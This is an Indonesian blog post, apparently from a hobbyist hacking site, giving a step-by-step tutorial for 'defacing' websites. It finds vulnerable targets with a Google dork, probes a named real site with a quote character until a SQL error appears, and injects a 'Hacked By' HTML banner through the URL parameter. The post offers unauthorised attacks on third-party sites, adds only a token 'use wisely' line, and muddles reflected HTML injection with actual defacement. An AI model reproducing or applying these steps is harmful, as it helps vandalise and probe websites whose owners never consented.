Tutorial Deface Metode XSS



Halo sobat om heker kali ini om heker akan menjelaskan sedikit tutorial Deface Metode XSS upload Shell atau disebut juga Cross Site Scripting Attack adalah metode dimana client memasukan script HTML kedalam sebuah website.

oke Berikut penjelasannya dari tutorial Deface Metode XSS :

1.) Dorking, Dork :
inurl:news.php?id= ( kembangkan )


2.) Pilih lah salah satu situs atau website.


Screenshot_20180615-154848-picsay
Contohnya saya menggunakan situs :
http://www.jmtv.com/news.php?id=3

3.)  Cobalah masukan ' dibelakang url contohnya :
http://www.jmtv.com/news.php?id=3'

 Baca juga : Cara Upload Shell di CMS Wordpress

Jika blank ataupun muncul sql bla bla berarti vuln contohnya situs yang saya gunakan ini muncul :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
4.) Selanjutnya coba masukan script HTML dibelakang url contohnya :
http://www.jmtv.com/news.php?id=3%27<h1>Hacked By MastahCyber</h1>
Tips! : Kalian juga bisa mengubahnya dengan script HTML lainnya.

Nah setelah seperti itu akan muncul seperti gambar dibawah ini berarti kita berhasil mendeface situs tersebut dengan metode xss ini.
Screenshot_20180615-160038
Gunakanlah dengan bijak jangan sampai merugikan orang lain.

Baca juga :  Cara deface Tinymcpuk MediaTech

Sekian tutorial tentang Deface Metode XSS sampai jumpa di tutorial menarik lainnya.

Post a Comment

Previous Post Next Post